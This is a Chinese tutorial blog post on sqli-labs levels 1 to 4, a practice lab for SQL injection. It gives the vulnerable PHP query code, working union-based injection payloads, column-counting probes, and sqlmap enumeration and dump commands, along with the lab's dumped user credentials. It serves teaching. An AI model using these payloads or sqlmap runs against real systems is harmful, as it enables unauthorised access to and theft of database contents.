美文网首页
sqli-labs基础(二)

sqli-labs基础(二)

作者: pigdaqiang | 来源:发表于2020-01-13 21:44 被阅读0次

    基础注入

    less-1

    • 源码分析:
    <?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    }
    else 
    {
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}

?>

    mysql_query(query, connnection) # 对select show explain descdirbe 返回一个资源标识符,如果执行不正确返回false,对于其他执行成功返回true,否则返回false。执行sql查询语句,执行sql语句(该函数自动记录进行读取和缓存,如果运行 非缓存查询,mysql_unbuffered_query())

    mysql_fetch_array(data, array_type) # 函数从结果集中取得一行作为关联数组,data 可选项规定使用的数据指针,指针为mysql_query()函数产生的结果。type可选 默认:mysql_both 同时产生关联和数字数组,mysql_assoc 关联数组, mysql_num数字数组。相比[^mysql_fetch_row()]除了数据以数字索引方式存储在数组中,还将数据作为关联索引存储,用字段作为键名。。

    • 注入点

      插入 ' or 1=1 -- +

      由查询语句得知填入1' or 1=1 -- +得到重新闭合后的语句为:

      select xxx from where id='1' or 1=1 -- + LIMIT 0,1 --> select xxx from where id='1' or 1=1 通过这个直接操纵了sql语句的执行or 1=1 恒为真

      对比正常的语句:$sql="SELECT * FROM users WHERE id='1' LIMIT 0,1";

      因为没有对输入做出任何 的过滤导致可以直接插入符号控制sql语句的执行

    • 判断列

      插入' order by 4 -- +

      select xx from where id='1' order by 4 -- +

      返回正常则存在列数,返回错误则不存在(二分法判断列数)

    • union 语句的使用

      插入 -1' union select 1,2,database() -- +

      id=-1 两个sql语句联合操作时,当前一个语句选择内容为空,这里就将后面的语句内容显示出来

      判断出列了,可以使用union语句来将sql语句进行联合

      注意: union语句前后的选择列数要相同,union all 和union 的区别是增加了去重的功能

      查表:

      http://127.0.0.1/Less-1/index.php?id=1.1' union select 1, group_concat(table_name), 3 from information_schema.tables where table_schema='security' -- +

      结果:

      Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

      查字段:

      -1' union select 1, group_concat(column_name), 3 from information_schema.columns where table_name='users' -- +

      结果:

      Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

      查数据:

      -1' union select 1,username,password from users where id=2 -- +

      结果:

      Welcome    Dhakkan
Your Login name:Dummy
Your Password:p@ssword

      slqmap:

      python sqlmap.py -u url?id=1 # 查看是否有注入点
python sqlmap.py -u url?id=1 --dbs # 查看数据库
python sqlmap.py -u http://127.0.0.1/Less-1/index.php?id=1 -D security --tables # 查看数据表
python sqlmap.py -u http://127.0.0.1/Less-1/index.php?id=1 -D security -T users --columns # 查看数据库字段名
python sqlmap.py -u http://127.0.0.1/Less-1/index.php?id=1 -D security -T users -C username,password --dump # 查看指定字段的数据

      Database: security
Table: users
[13 entries]
+----------+------------+
| username | password   |
+----------+------------+
| admin    | admin      |
| admin1   | admin1     |
| admin2   | admin2     |
| admin3   | admin3     |
| admin4   | admin4     |
| secure   | crappy     |
| Dumb     | Dumb       |
| dhakkan  | dumbo      |
| superman | genious    |
| Angelina | I-kill-you |
| batman   | mob!le     |
| Dummy    | p@ssword   |
| stupid   | stupidity  |
+----------+------------+

    Less-2

    • 源码如下:
    // connectivity 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; // 直接带入查询不需要引号闭合
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    • 手工判断注入点

      输入' 和''发现报错,报错信息如下

      Welcome    Dhakkan
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

      带入之后执行的语句如下:

      select * from TABLE where id=1';

      奇数个单引号带入查询,发现错误,得到结论直接是整数带入查询,没有特殊符号,不需要闭合。(直接使用查询语句就好)

      select * from TABLE where id = (some integer value)

      直接使用查询语句,注释掉后面的部分,查询语句如下:

      http://127.0.0.1/Less-2/index.php?id=1.1 union select 1,database(),version() --+  //查数据库名和版本号
http://127.0.0.1/Less-2/index.php?id=1.1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+ // 查询所有数据库的名称
http://127.0.0.1/Less-2/index.php?id=1.1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- + // 查询指定数据库的表名
http://127.0.0.1/Less-2/index.php?id=1.1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- + //查询指定表的字段名
http://127.0.0.1/Less-2/index.php?id=1.1 union select 1,group_concat(id, username, password), 3 from users -- + // 查询字段数据 也可以加上where id=1 来查询指定的数据

      结果:

      Welcome    Dhakkan
Your Login name:security
Your Password:5.5.44-0ubuntu0.14.04.1

Welcome    Dhakkan
Your Login name:information_schema,challenges,mysql,performance_schema,security
Your Password:3

Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

Welcome    Dhakkan
Your Login name:1DumbDumb,2AngelinaI-kill-you,3Dummyp@ssword,4securecrappy,5stupidstupidity,6supermangenious,7batmanmob!le,8adminadmin,9admin1admin1,10admin2admin2,11admin3admin3,12dhakkandumbo,14admin4admin4
Your Password:3

Welcome    Dhakkan
Your Login name:4securecrappy
Your Password:3

    • sqlmap跑如下:

      sqlmap -u http://127.0.0.1/Less-2/index.php?id=1
--dbs
-D security --tables
-D security -T users --columns # 如果已知数据表数据较少可以直接--dump
-D security -T users -C id,username,password --dump
或者-D security -T users --dump

    Less-3

    • sql操作源码如下:
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; // 这里使用')来闭合
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    • 手工判断

      输入')报错如下

      Welcome Dhakkan You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') LIMIT 0,1' at line 1

      注释闭合后正常执行

      http://127.0.0.1/Less-2/index.php?id=1.1’)union select 1,database(),version() --+  //查数据库名和版本号
步骤如less-2
注意闭合部分为')

Welcome    Dhakkan
Your Login name:security
Your Password:5.5.44-0ubuntu0.14.04.1

    • sqlmap 操作如上一样

    Less-4

    • sql操作语句如下:

      $id = '"' . $id . '"'; //对$id前后加上了“”来修饰,所以闭合id 需要“
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1"; // 对id加上了()来修饰,加上id自带的”“所以闭合符号为"),其他都是一样的。
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

      其他查询语句和上面的都是一样的

    相关文章

      网友评论

          本文标题:sqli-labs基础(二)

          本文链接:https://www.haomeiwen.com/subject/vwgnactx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|sqli-labs基础(二)|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!